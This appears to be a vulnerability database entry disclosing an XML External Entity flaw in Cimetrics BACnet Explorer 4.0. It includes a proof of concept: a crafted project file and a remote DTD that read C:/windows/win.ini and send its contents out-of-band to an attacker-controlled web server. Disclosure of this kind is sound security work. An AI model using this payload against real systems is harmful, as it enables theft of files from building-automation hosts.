Cimetrics BACnet Explorer 4.0 XXE...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### Summary The BACnet Explorer is a BACnet client application that helps auto discover BACnet devices. ### Description BACnetExplorer suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project file. ### Vendor Cimetrics, Inc. - https://www.cimetrics.com ### Affected Version 4.0.0.0 ### Tested On * Microsoft Windows 7 Professional SP1 (EN) * Microsoft Windows 7 Ultimate SP1 (EN) ### PoC Open file evil.xml: ``` <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE zsl [ <!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml"> %remote; %root; %oob;]> ``` xxe.xml on the web server: ``` <!ENTITY % payload SYSTEM "file:///C:/windows/win.ini"> <!ENTITY % root "<!ENTITY &#37; oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> "> ```...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息